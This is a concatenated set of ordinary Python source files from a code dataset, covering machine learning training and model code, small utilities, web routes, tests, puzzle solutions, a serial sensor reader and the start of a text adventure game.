np.mean(train_seg_iou),\n \"val_seg_iou\": np.mean(val_seg_iou)\n },\n epoch)\n tbX_logger.add_scalars(\n \"dist_iou\", {\n \"train_dist_iou\": np.mean(train_dist_iou),\n \"val_dist_iou\": np.mean(val_dist_iou)\n },\n epoch)\n\n # Convert training images for plotting\n train_input_tb = make_grid(train_inputs).cpu().numpy()\n train_seg_tb = make_grid(utils.colormap(\n train_seg.float().div(cfg.N_CLASSES).unsqueeze(1).cpu())).numpy()\n train_seg_prediction_tb = make_grid(utils.colormap(\n torch.argmax(train_predicted_seg, dim=1).float() \\\n .div(cfg.N_CLASSES).unsqueeze(1).cpu())).numpy()\n train_dist_tb = make_grid(utils.colormap(\n train_dist.float().div(cfg.N_ENERGY_LEVELS).unsqueeze(1).cpu())).numpy()\n train_dist_prediction_tb = make_grid(utils.colormap(\n torch.argmax(train_predicted_dist, dim=1).float() \\\n .div(cfg.N_ENERGY_LEVELS).unsqueeze(1).cpu())).numpy()\n\n blue_channel = torch.zeros(\n cfg.TRAIN_BATCH_SIZE,\n 1,\n cfg.DATA_RESCALE,\n cfg.DATA_RESCALE).to(rank)\n\n # Convert val images for plotting\n val_input_tb = make_grid(val_inputs).cpu().numpy()\n val_seg_tb = make_grid(utils.colormap(\n val_seg.float().div(cfg.N_CLASSES).unsqueeze(1).cpu())).numpy()\n val_seg_prediction_tb = make_grid(utils.colormap(\n torch.argmax(val_predicted_seg, dim=1).float() \\\n .div(cfg.N_CLASSES).unsqueeze(1).cpu())).numpy()\n val_dist_tb = make_grid(utils.colormap(\n val_dist.float().div(cfg.N_ENERGY_LEVELS).unsqueeze(1).cpu())).numpy()\n val_dist_prediction_tb = make_grid(utils.colormap(\n torch.argmax(val_predicted_dist, dim=1).float() \\\n .div(cfg.N_ENERGY_LEVELS).unsqueeze(1).cpu())).numpy() \n\n # Training images\n tbX_logger.add_image(\"train_input\", train_input_tb, epoch)\n tbX_logger.add_image(\"train_seg\", train_seg_tb, epoch)\n tbX_logger.add_image(\n \"train_seg_prediction\",\n train_seg_prediction_tb,\n epoch)\n tbX_logger.add_image(\"train_dist\", train_dist_tb, epoch) \n tbX_logger.add_image(\n \"train_dist_prediction\",\n train_dist_prediction_tb,\n epoch)\n\n # Validation images\n tbX_logger.add_image(\"val_input\", val_input_tb, epoch)\n tbX_logger.add_image(\"val_seg\", val_seg_tb, epoch)\n tbX_logger.add_image(\n \"val_seg_prediction\",\n val_seg_prediction_tb,\n epoch)\n tbX_logger.add_image(\"val_dist\", val_dist_tb, epoch) \n tbX_logger.add_image(\n \"val_dist_prediction\",\n val_dist_prediction_tb,\n epoch)\n\n # Divide unnormalised matrices\n 
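# (they were accumulated once per batch above, so this gives the epoch averages)\n                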
train_seg_confusion /= len(loader_train)\n                train_dist_confusion /= len(loader_train)\n                val_seg_confusion /= len(loader_val)\n                val_dist_confusion /= len(loader_val)\n\n                # Normalise confusion matrices\n                train_seg_confusion_n = utils.normalise_confusion_mat(\n                    train_seg_confusion)\n                train_dist_confusion_n = utils.normalise_confusion_mat(\n                    train_dist_confusion)\n                val_seg_confusion_n = utils.normalise_confusion_mat(\n                    val_seg_confusion)\n                val_dist_confusion_n = utils.normalise_confusion_mat(\n                    val_dist_confusion)\n\n                # Log confusion matrices to tensorboard\n                log_all_confusion_mat(\n                    tbX_logger,\n                    train_seg_confusion,\n                    train_dist_confusion,\n                    val_seg_confusion,\n                    val_dist_confusion,\n                    epoch,\n                    isnormalised=False)\n\n                # Log normalised confusion matrices to tensorboard\n                log_all_confusion_mat(\n                    tbX_logger,\n                    train_seg_confusion_n,\n                    train_dist_confusion_n,\n                    val_seg_confusion_n,\n                    val_dist_confusion_n,\n                    epoch,\n                    isnormalised=True)\n\n        # Save checkpoint\n        if epoch % 20 == 0 and epoch != 0 and rank == 0:\n            save_path = os.path.join(\n                cfg.PRETRAINED_PATH,\n                \"%s_%s_%s_epoch%d.pth\"\n                %(cfg.MODEL_NAME, cfg.MODEL_BACKBONE, cfg.DATA_NAME, epoch))\n            torch.save(model.state_dict(), save_path)\n            print(\"%s has been saved.\" %save_path)\n\n    if cfg.LOG and rank == 0:\n        tbX_logger.close()\n\n    # Save final trained model\n    if rank == 0:\n        save_path = os.path.join(\n            cfg.PRETRAINED_PATH,\n            \"%s_%s_%s_epoch%d_final_noskip_noaspp.pth\"\n            %(cfg.MODEL_NAME, cfg.MODEL_BACKBONE, cfg.DATA_NAME, cfg.TRAIN_EPOCHS))\n        torch.save(model.state_dict(), save_path)\n        print(\"FINISHED: %s has been saved.\" %save_path)\n\n    distr.destroy_process_group()\n\n\nif __name__ == \"__main__\":\n\n    world_size = cfg.TRAIN_GPUS\n    # Spawn training processes\n    multiproc.spawn(train, args=(world_size,), nprocs=world_size, join=True)","sub_path":"voc_distributed_train.py","file_name":"voc_distributed_train.py","file_ext":"py","file_size_in_byte":22643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"331341015","text":"\n\n# class header\nclass _SCORPION():\n\tdef __init__(self,): \n\t\tself.name = \"SCORPION\"\n\t\tself.definitions = [u'a small creature similar to an insect that lives in hot, dry areas of the world and has a long body and a curved tail with a poisonous sting (= pointed part that can go through skin)']\n\n\t\tself.parents = []\n\t\tself.children = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_scorpion.py","file_name":"_scorpion.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"628823667","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\n\ndef load_train_data():\n\tdf = pd.read_csv('train.csv')\n\tX = df.values.copy()\n\tnp.random.shuffle(X)\n\tX, labels = X[:, 1:-1].astype(np.float32), X[:, -1]\n\tencoder = LabelEncoder()\n\ty = encoder.fit_transform(labels).astype(np.int32)\n\tscaler = StandardScaler()\n\tX = scaler.fit_transform(X)\n\treturn X, y, encoder, scaler\n\ndef load_test_data(scaler):\n\tdf = pd.read_csv('test.csv')\n\tX = df.values.copy()\n\tX, ids = X[:, 1:].astype(np.float32), X[:, 0].astype(str)\n\tX = scaler.transform(X)\n\treturn X, ids\n\ndef make_submission(clf, X_test, ids, encoder, name='submission.csv'):\n\ty_prob = 
clf.predict_proba(X_test)\n\twith open(name, 'w') as f:\n\t\tf.write('id,')\n\t\tf.write(','.join(encoder.classes_))\n\t\tf.write('\\n')\n\t\tfor id, probs in zip(ids, y_prob):\n\t\t\tprobas = ','.join([id] + list(map(str, probs.tolist())))\n\t\t\tf.write(probas)\n\t\t\tf.write('\\n')\n\tprint(\"Wrote submission to file {}.\".format(name))","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"126244881","text":"import sys\nsys.setrecursionlimit(1 << 20)\nINF = float('inf')\n\n\ndef read_int_list():\n    return list(map(int, input().split()))\n\n\ndef read_ints():\n    return map(int, input().split())\n\n\ndef main():\n    A, B, K, L = read_ints()\n    BL = B / L\n    if A <= BL:\n        print(K * A)\n    else:\n        if K % L == 0:\n            print(B * (K // L))\n        else:\n            cand1 = B * (K // L + 1)\n            cand2 = B * (K // L) + A * (K - L * (K // L))\n            print(min(cand1, cand2))\n\n\nmain()\n","sub_path":"arc/arc56a.py","file_name":"arc56a.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"144632126","text":"import torch.nn as nn\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom Aggregator import MeanAggregator, AttnAggregator\n\n\nclass RENet(nn.Module):\n    def __init__(self, in_dim, h_dim, num_rels, dropout=0, model=0, seq_len=10):\n        super(RENet, self).__init__()\n        self.in_dim = in_dim\n        self.h_dim = h_dim\n        self.num_rels = num_rels\n        self.model = model\n        self.seq_len = seq_len\n        self.rel_embeds = nn.Parameter(torch.Tensor(num_rels, h_dim))\n        nn.init.xavier_uniform_(self.rel_embeds,\n                                gain=nn.init.calculate_gain('relu'))\n\n        self.ent_embeds = nn.Parameter(torch.Tensor(in_dim, h_dim))\n        nn.init.xavier_uniform_(self.ent_embeds,\n                                gain=nn.init.calculate_gain('relu'))\n\n        self.dropout = nn.Dropout(dropout)\n        self.sub_encoder = nn.GRU(3 * h_dim, h_dim, batch_first=True)\n        self.ob_encoder = nn.GRU(3 * h_dim, h_dim, batch_first=True)\n\n        if model == 0: # Attentive Aggregator\n            self.aggregator_s = AttnAggregator(h_dim, dropout, seq_len)\n            self.aggregator_o = AttnAggregator(h_dim, dropout, seq_len)\n        elif model == 1: # Mean Aggregator\n            self.aggregator_s = MeanAggregator(h_dim, dropout, seq_len, gcn=False)\n            self.aggregator_o = MeanAggregator(h_dim, dropout, seq_len, gcn=False)\n        elif model == 2: # GCN Aggregator\n            self.aggregator_s = MeanAggregator(h_dim, dropout, seq_len, gcn=True)\n            self.aggregator_o = MeanAggregator(h_dim, dropout, seq_len, gcn=True)\n\n\n        self.linear_sub = nn.Linear(3 * h_dim, in_dim)\n        self.linear_ob = nn.Linear(3 * h_dim, in_dim)\n\n        # For recording history in inference\n        self.s_hist_test = [[[] for _ in range(num_rels)] for _ in range(in_dim)]\n        self.o_hist_test = [[[] for _ in range(num_rels)] for _ in range(in_dim)]\n        self.s_his_cache = [[[] for _ in range(num_rels)] for _ in range(in_dim)]\n        self.o_his_cache = [[[] for _ in range(num_rels)] for _ in range(in_dim)]\n        self.latest_time = 0\n\n        self.criterion = nn.CrossEntropyLoss()\n\n\n    \"\"\"\n    Prediction function in training. 
\n This should be different from testing because in testing we don't use ground-truth history.\n \"\"\"\n def forward(self, triplets, s_hist, o_hist):\n s = triplets[:, 0]\n r = triplets[:, 1]\n o = triplets[:, 2]\n\n s_hist_len = torch.LongTensor(list(map(len, s_hist))).cuda()\n s_len, s_idx = s_hist_len.sort(0, descending=True)\n\n o_hist_len = torch.LongTensor(list(map(len, o_hist))).cuda()\n o_len, o_idx = o_hist_len.sort(0, descending=True)\n\n s_packed_input = self.aggregator_s(s_hist, s, r, self.ent_embeds, self.rel_embeds)\n o_packed_input = self.aggregator_o(o_hist, o, r, self.ent_embeds, self.rel_embeds)\n\n tt, s_h = self.sub_encoder(s_packed_input)\n tt, o_h = self.ob_encoder(o_packed_input)\n\n s_h = s_h.squeeze()\n o_h = o_h.squeeze()\n\n # print(s_h.shape)\n s_h = torch.cat((s_h, torch.zeros(len(s) - len(s_h), self.h_dim).cuda()), dim=0)\n o_h = torch.cat((o_h, torch.zeros(len(o) - len(o_h), self.h_dim).cuda()), dim=0)\n\n ob_pred = self.linear_sub(\n self.dropout(torch.cat((self.ent_embeds[s[s_idx]], s_h, self.rel_embeds[r[s_idx]]), dim=1)))\n sub_pred = self.linear_ob(\n self.dropout(torch.cat((self.ent_embeds[o[o_idx]], o_h, self.rel_embeds[r[o_idx]]), dim=1)))\n\n loss_sub = self.criterion(ob_pred, o[s_idx])\n loss_ob = self.criterion(sub_pred, s[o_idx])\n\n loss = loss_sub + loss_ob\n\n return loss, sub_pred, ob_pred, o_idx, s_idx\n\n\n def init_history(self):\n self.s_hist_test = [[[] for _ in range(self.num_rels)] for _ in range(self.in_dim)]\n self.o_hist_test = [[[] for _ in range(self.num_rels)] for _ in range(self.in_dim)]\n self.s_his_cache = [[[] for _ in range(self.num_rels)] for _ in range(self.in_dim)]\n self.o_his_cache = [[[] for _ in range(self.num_rels)] for _ in range(self.in_dim)]\n\n\n def get_loss(self, triplets, s_hist, o_hist):\n loss, _, _, _, _ = self.forward(triplets, s_hist, o_hist)\n return loss\n\n \"\"\"\n Prediction function in testing\n \"\"\"\n def predict(self, triplet, s_hist, o_hist):\n s = triplet[0]\n r = triplet[1]\n o = triplet[2]\n t = triplet[3].cpu()\n\n if self.latest_time != t:\n for rr in range(self.num_rels):\n for ee in range(self.in_dim):\n if len(self.s_his_cache[ee][rr]) != 0:\n if len(self.s_hist_test[ee][rr]) >= self.seq_len:\n self.s_hist_test[ee][rr].pop(0)\n self.s_hist_test[ee][rr].append(self.s_his_cache[ee][rr].clone())\n self.s_his_cache[ee][rr] = []\n if len(self.o_his_cache[ee][rr]) != 0:\n if len(self.o_hist_test[ee][rr]) >= self.seq_len:\n self.o_hist_test[ee][rr].pop(0)\n self.o_hist_test[ee][rr].append(self.o_his_cache[ee][rr].clone())\n\n self.o_his_cache[ee][rr] = []\n self.latest_time = t\n\n # If there is no history\n if len(s_hist) == 0:\n s_h = torch.zeros(self.h_dim).cuda()\n else:\n if len(self.s_hist_test[s][r]) == 0:\n self.s_hist_test[s][r] = s_hist.copy()\n s_history = self.s_hist_test[s][r]\n inp = self.aggregator_s.predict(s_history, s, r, self.ent_embeds, self.rel_embeds)\n tt, s_h = self.sub_encoder(inp.view(1, len(s_history), 3 * self.h_dim))\n s_h = s_h.squeeze()\n \n if len(o_hist) == 0:\n o_h = torch.zeros(self.h_dim).cuda()\n else:\n if len(self.o_hist_test[o][r]) == 0:\n self.o_hist_test[o][r] = o_hist.copy()\n o_history = self.o_hist_test[o][r]\n inp = self.aggregator_o.predict(o_history, o, r, self.ent_embeds, self.rel_embeds)\n tt, o_h = self.ob_encoder(inp.view(1, len(o_history), 3 * self.h_dim))\n o_h = o_h.squeeze()\n\n ob_pred = self.linear_sub(torch.cat((self.ent_embeds[s], s_h, self.rel_embeds[r]), dim=0))\n sub_pred = self.linear_ob(torch.cat((self.ent_embeds[o], o_h, 
self.rel_embeds[r]), dim=0))\n\n tt, o_candidate = torch.topk(ob_pred, self.seq_len)\n tt, s_candidate = torch.topk(sub_pred, self.seq_len)\n if len(self.s_his_cache[s][r]) == 0:\n self.s_his_cache[s][r] = o_candidate\n if len(self.o_his_cache[o][r]) == 0:\n self.o_his_cache[o][r] = s_candidate\n\n loss_sub = self.criterion(ob_pred.view(1, -1), o.view(-1))\n loss_ob = self.criterion(sub_pred.view(1, -1), s.view(-1))\n\n loss = loss_sub + loss_ob\n\n return loss, sub_pred, ob_pred\n\n\n def evaluate(self, triplet, s_hist, o_hist):\n s = triplet[0]\n r = triplet[1]\n o = triplet[2]\n\n loss, sub_pred, ob_pred = self.predict(triplet, s_hist, o_hist)\n o_label = o\n s_label = s\n ob_pred_comp1 = (ob_pred > ob_pred[o_label]).data.cpu().numpy()\n ob_pred_comp2 = (ob_pred == ob_pred[o_label]).data.cpu().numpy()\n rank_ob = np.sum(ob_pred_comp1) + ((np.sum(ob_pred_comp2) - 1.0) / 2) + 1\n\n sub_pred_comp1 = (sub_pred > sub_pred[s_label]).data.cpu().numpy()\n sub_pred_comp2 = (sub_pred == sub_pred[s_label]).data.cpu().numpy()\n rank_sub = np.sum(sub_pred_comp1) + ((np.sum(sub_pred_comp2) - 1.0) / 2) + 1\n\n return np.array([rank_sub, rank_ob]), loss\n\n\n def evaluate_filter(self, triplet, s_hist, o_hist, all_triplets):\n s = triplet[0]\n r = triplet[1]\n o = triplet[2]\n loss, sub_pred, ob_pred = self.predict(triplet, s_hist, o_hist)\n o_label = o\n s_label = s\n sub_pred = F.sigmoid(sub_pred)\n ob_pred = F.sigmoid(ob_pred)\n\n ground = ob_pred[o].clone()\n\n s_id = torch.nonzero(all_triplets[:, 0] == s).view(-1)\n idx = torch.nonzero(all_triplets[s_id, 1] == r).view(-1)\n idx = s_id[idx]\n idx = all_triplets[idx, 2]\n ob_pred[idx] = 0\n ob_pred[o_label] = ground\n\n ob_pred_comp1 = (ob_pred > ground).data.cpu().numpy()\n ob_pred_comp2 = (ob_pred == ground).data.cpu().numpy()\n rank_ob = np.sum(ob_pred_comp1) + ((np.sum(ob_pred_comp2) - 1.0) / 2) + 1\n\n ground = sub_pred[s].clone()\n\n o_id = torch.nonzero(all_triplets[:, 2] == o).view(-1)\n idx = torch.nonzero(all_triplets[o_id, 1] == r).view(-1)\n idx = o_id[idx]\n idx = all_triplets[idx, 0]\n sub_pred[idx] = 0\n sub_pred[s_label] = ground\n\n sub_pred_comp1 = (sub_pred > ground).data.cpu().numpy()\n sub_pred_comp2 = (sub_pred == ground).data.cpu().numpy()\n rank_sub = np.sum(sub_pred_comp1) + ((np.sum(sub_pred_comp2) - 1.0) / 2) + 1\n return np.array([rank_sub, rank_ob]), loss\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"586682083","text":"# -*- coding: utf-8 -*-\r\n'''\r\nLibrary containing useful functions for cross validation\r\n@author: bharback\r\n'''\r\n\r\nimport numpy as np\r\nimport scipy.sparse as spa\r\n\r\ndef model_cross_validation(model, X: spa.csr_matrix , Y: spa.csr_matrix, folds,\r\n verbose = False):\r\n '''Performs cross validation on the folds specified by folds, which should\r\n be defined using sklearn. Returns an array containing the accuracies computed\r\n on each fold. 
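The model is refit on each fold's training split. 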
Verbose toggles a printed message after completed folds'''\r\n    kfolds = len(folds)\r\n    train_performance, validation_performance = np.empty(kfolds), np.empty(kfolds)\r\n    for i in range(kfolds):\r\n        train, validation = folds[i]\r\n        X_train, Y_train = X[train], Y[train]\r\n        X_validation, Y_validation = X[validation], Y[validation]\r\n        model.fit(X_train,Y_train)\r\n        train_accuracy = np.average(model.predict(X_train) == Y_train)\r\n        validation_accuracy = np.average(model.predict(X_validation) == Y_validation)\r\n        train_performance[i] = train_accuracy\r\n        validation_performance[i] = validation_accuracy\r\n        if verbose:\r\n            print(\"Fold number {} completed.\".format(i))\r\n    return np.array(train_performance),np.array(validation_performance)\r\n","sub_path":"LIB_CrossValidation.py","file_name":"LIB_CrossValidation.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"146206260","text":"# -*- coding: UTF-8 -*-\n'''\nCreated on 2020/11/18 17:54\n@File  : get_add_punctuation_compare.py\n@author: ZL\n@Desc  : Teacher Liao's request: for intent and similarity, break a sentence at a random position by inserting a punctuation mark, then check whether the two sentences are still judged similar, or whether the sentence intent changes\n        Punctuation marks: // match these Chinese punctuation marks 。 ? ! , 、 ; : “ ” ‘ ' ( ) 《 》 〈 〉 【 】 『 』 「 」 ﹃ ﹄ 〔 〕 … — ~ ﹏ ¥\n'''\n\nimport random\nfrom commonfunc.change_data_type import ChangeDataType\nimport os\nimport requests\nimport pandas\nfrom tqdm import tqdm\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\n\n\nclass GetAddPunctuationCompare:\n\n    def get_add_punctuation(self, sentence):\n        punctuation = [\"。\", \"?\", \"!\", \",\", \"、\", \";\", \":\", \"“\", \"”\", \"‘\", \"(\", \")\", \"《\", \"》\", \"〈\", \"〉\", \"【\", \"】\", \"『\",\n                       \"』\", \"「\", \"」\", \"﹃\", \"﹄\", \"〔\", \"〕\", \"…\", \"—\", \"~\", \"﹏\", \"¥\"]\n        sentence_list = list(sentence)\n        sentence_list.insert(random.randint(0, len(sentence_list) - 1), random.choice(punctuation))\n        return \"\".join(sentence_list)\n\n    def get_similar_compare(self, url, test_file, result_file):\n        test_data = ChangeDataType.file_to_dict(rootPath + \"\\\\testdata\\\\comparedata\\\\\" + test_file)\n        sentence_list = test_data.sentence.tolist()\n        str1_list, str2_list, result_score_list, origin_score_list = [], [], [], []\n        for j in tqdm(sentence_list):\n            str1 = j\n            str2 = GetAddPunctuationCompare.get_add_punctuation(self, j)\n            params = {\n                \"str1\": str1,\n                \"str2\": str2,\n                \"model\": \"Siamese\"\n            }\n            try:\n                result = requests.get(url=url, params=params).json()\n                threshold = result[\"sim_score\"]\n                if threshold >= 0.742:\n                    result_score_list.append(1)\n                else:\n                    result_score_list.append(0)\n\n                str1_list.append(str1)\n                str2_list.append(str2)\n                origin_score_list.append(threshold)\n            except Exception as e:\n                print(j)\n                print(e)\n        result_data = pandas.DataFrame({\"str1\": str1_list, \"str2\": str2_list, \"origin_score\": origin_score_list,\n                                        \"result_score\": result_score_list})\n        result_data.to_csv(rootPath + \"\\\\testresults\\\\resultfile\\\\punctuation_compare\\\\\" + result_file)\n\n    def get_intention_compare(self, url, test_file, result_file):\n        test_data = ChangeDataType.file_to_dict(rootPath + \"\\\\testdata\\\\comparedata\\\\\" + test_file)\n        sentence_list = test_data.sentence.tolist()\n        str1_list, str2_list, intention1_list, intention2_list, tf_list = [], [], [], [], []\n        for j in tqdm(sentence_list):\n            str1 = j\n            str2 = GetAddPunctuationCompare.get_add_punctuation(self, j)\n            params1 = {\n                \"utterance\": str1\n            }\n            params2 = {\n                \"utterance\": str2\n            }\n            try:\n                result1 = requests.get(url=url, 
params=params1).json()\n                result2 = requests.get(url=url, params=params2).json()\n                intention1 = result1[\"data\"][\"intent\"]\n                intention2 = result2[\"data\"][\"intent\"]\n\n                str1_list.append(str1)\n                str2_list.append(str2)\n                intention1_list.append(intention1)\n                intention2_list.append(intention2)\n                tf_list.append(intention1 == intention2)\n            except Exception as e:\n                print(j)\n                print(e)\n        result_data = pandas.DataFrame(\n            {\"sentence1\": str1_list, \"sentence2\": str2_list, \"intention1\": intention1_list,\n             \"intention2\": intention2_list, \"tf\": tf_list})\n        result_data.to_csv(rootPath + \"\\\\testresults\\\\resultfile\\\\punctuation_compare\\\\\" + result_file)\n\n\nif __name__ == '__main__':\n    # GetAddPunctuationCompare().get_similar_compare(\"http://192.168.1.79:8234/bert_similarity/v2\", \"similar_test.csv\",\n    #                                                \"punctuation_compare_similar_result.csv\")\n    # http://192.168.26.105:30202/intention/v2/common\n    GetAddPunctuationCompare().get_intention_compare(\"http://192.168.26.105:30202/intention/v2/common\",\n                                                     \"intention_test.csv\",\n                                                     \"punctuation_compare_intention_result.csv\")\n","sub_path":"api/get_add_punctuation_compare.py","file_name":"get_add_punctuation_compare.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"239474643","text":"from tests import BaseCase\nfrom google.appengine.ext import ndb\nfrom rest import utils\nimport mock\n\n\nclass RestUtilsBaseCase(BaseCase):\n    pass\n\n\n@mock.patch('base64.urlsafe_b64encode')\nclass GetResourceIdTestCase(RestUtilsBaseCase):\n\n    def test_single_pair(self, m_encode):\n        key = ndb.Key('Parent', 123)\n        utils.get_resource_id_from_key(key)\n        m_encode.assert_called_once_with(u'Parent\\x1e\\x1f123')\n\n    def test_multiple_pair(self, m_encode):\n        key = ndb.Key('Parent', 123, 'Child', 'el-ni\\u2099o')\n        utils.get_resource_id_from_key(key)\n        m_encode.assert_called_once_with(u'Parent\\x1e\\x1f123\\x1eChild\\x1eel-ni\\\\u2099o')\n\n\nclass GetResourceIdIntegrationCase(RestUtilsBaseCase):\n\n    def test_single_pair(self):\n        key = ndb.Key('Parent', 123)\n        result = utils.get_resource_id_from_key(key)\n        self.assertEqual(result, 'UGFyZW50Hh8xMjM')\n\n    def test_multiple_pair(self):\n        key = ndb.Key('Parent', 123, 'Child', 'el-ni\\u2099o')\n        result = utils.get_resource_id_from_key(key)\n        self.assertEqual(result, 'UGFyZW50Hh8xMjMeQ2hpbGQeZWwtbmlcdTIwOTlv')\n\n\nclass GetKeyFromResource(RestUtilsBaseCase):\n\n    def test_base_case(self):\n        \"\"\"\n        Test general conversion including int ids\n        \"\"\"\n\n        result = utils.get_key_from_resource_id('UGFyZW50Hh8xMjMeQ2hpbGQeZWwtbmlcdTIwOTlv')\n        self.assertEqual(result, ndb.Key('Parent', 123, 'Child', 'el-ni\\u2099o'))\n\n    def test_get_triple(self):\n        \"\"\"\n        Additional Test Case to ensure that we can do more than 3 pairs\n        \"\"\"\n\n        result = utils.get_key_from_resource_id('UGFyZW50Hh8xMjMeQ2hpbGQeHzQ1Nh5HcmFuZB4fNzg5')\n        self.assertEqual(result, ndb.Key('Parent', 123, 'Child', 456, 'Grand', 789))\n","sub_path":"tests/rest/utils_tests.py","file_name":"utils_tests.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"303632027","text":"one = 3\ntwo = 3\nthree = 5\nfour = 4\nfive = 4\nsix = 3\nseven = 5\neight = 5\nnine = 4\nten = 3\neleven = 6\ntwelve = 6\nthirteen = 8\nfourteen = 8\nfifteen = 7\nsixteen = 7\nseventeen = 9\neighteen = 8\nnineteen = 8\ntwenty = 6\nthirty = 6\nforty = 5\nfifty = 5\nsixty = 5\nseventy = 7\neighty = 
6\nninety = 6\nhundred = 7\nthousand = 8\nandd = 3\n\n# the number of letters is:\n\nrezultat_do_100 = (one + two + three + four + five + six + seven + eight + nine) * 9 +\\\n                  ten + eleven + twelve + thirteen + fourteen + fifteen + sixteen + seventeen + eighteen + nineteen +\\\n                  (twenty + thirty + forty + fifty + sixty + seventy + eighty + ninety) * 10\n\nrezultat_do_1000 = (one + two + three + four + five + six + seven + eight + nine) * 100 + andd * 99 * 9 +\\\n                   one + thousand + rezultat_do_100 * 10 + hundred * (999 - 99)\n\n\nprint(rezultat_do_1000)","sub_path":"project_euler_17.py","file_name":"project_euler_17.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"109093925","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nurlpatterns = [\n    url(r'^admin/', admin.site.urls),\n    url(r'^inventory/', include('inventory.urls', namespace='inventory')),\n    url(r'^announcements/', include('announcements.urls', namespace='announcements')),\n    url(r'^users/', include('users.urls', namespace='users')),\n    url(r'^stocktaking/', include('stocktaking.urls', namespace='stocktaking')),\n    url(r'', include('panel.urls', namespace='panel')),\n\n]\n","sub_path":"control/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"116504560","text":"\"\"\" How Many Numbers Are Smaller Than the Current Number\n\n\nGiven the array nums, for each nums[i] find out how many numbers\n in the array are smaller than it. That is, for each nums[i] you\n have to count the number of valid j's such that j != i and nums[j] < nums[i].\n\nReturn the answer in an array.\"\"\"\n\n\ndef smallerNumbersThanCurrent(nums):\n    # [8,3,2,2,1]\n\n    sorted_num = sorted(nums, reverse=True)\n    dacount = { }\n    for i in range(len(sorted_num) - 1):\n        if sorted_num[ i ] > sorted_num[ i + 1 ]:\n            dacount[ sorted_num[ i ] ] = len(sorted_num) - (i + 1)\n    dacount[ sorted_num[ -1 ] ] = 0\n\n    output = [ ]\n    for num in nums:\n        output.append(dacount[ num ])\n\n    return output\n\n\nprint(smallerNumbersThanCurrent([ 8, 4, 5, 3, 3, 2, 2, 2, 1 ]))\n","sub_path":"smallernums.py","file_name":"smallernums.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"33276378","text":"import serial\nfrom vpython import *\n\narduinoSerialData = serial.Serial('/dev/ttyACM0', 9600) #create an object to read the serial port\nmeasuringRod = cylinder(length=6, color=color.yellow, radius=.5, pos=(-3,0,0))\n\nwhile (1 == 1): #loop forever\n\trate(20)\n\tif (arduinoSerialData.inWaiting()>0): #Check to see if data is on serial port\n\t\tmyData = arduinoSerialData.readline() #If data is there, then read it\n\t\tdistance = float(myData) #Convert string myData to floating point number and hold in distance variable\n\t\tprint (distance)\n\t\tmeasuringRod.length=distance\n\n","sub_path":"ultra/ultrassom.py","file_name":"ultrassom.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"289567631","text":"from sys import exit\nimport combat\n\nclass Scene(object):\n\t\n\tdef enter(self):\n\t\tprint (\"This scene hasn't been written yet\")\n\t\treturn Bar()\n\nclass Choice(object):\n\n\tdef __init__(self, possible_answers, responses):\n\t\tself.possible_answers = 
possible_answers\n\t\tself.responses = responses\n\t\t\n\tdef choice(self):\n\t\n\t\tp_a_index = range(0,len(self.possible_answers)) # possible answer index list\n\t\tp_a_nums = list(map(str,range(1,len(self.possible_answers)+1)))\n\t\n\t\twhile True:\n\t\t\n\t\t\tfor i in p_a_index:\n\t\t\t\tprint (\"%d: %s\" % (i+1, self.possible_answers[i]))\n\t\t\n\t\t\tanswer = input(\"> \")\n\t\t\t\n\t\t\tif answer not in self.possible_answers + p_a_nums:\n\t\t\t\tprint (self.responses[-1])\n\t\t\t\tcontinue\n\t\t\n\t\t\tfor i in p_a_index:\n\t\t\t\n\t\t\t\tif answer == self.possible_answers[i] or answer == p_a_nums[i]:\n\t\t\t\t\tprint (self.responses[i])\n\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\treturn i + 1\n\t\t\tbreak\n\t\t\t\nclass Death(Scene):\n\t\t\n\tdef enter(self):\n\t\tprint (\"You died.\")\n\t\treturn Bar()\n\t\t\nclass Boring(Scene):\n\n\tdef enter(self):\n\t\tprint (\"You were never cut out to be a hero.\")\n\t\tprint (\"You do nothing noteworthy for the rest of your life and you die\")\n\t\tprint (\"unsatisfied and alone.\")\n\t\treturn Bar()\n\nclass Bar(Scene):\n\n\tdef enter(self):\n\t\tprint (\"You enter a bar\")\n\t\tprint (\"What do you do?\")\n\t\t\n\t\tpossible_answers = ['order lager','order grog', 'spit at bartender']\n\t\tresponses = ['Boring!',\n\t\t'The drink of a true adventurer! There\\'s someone I think you should 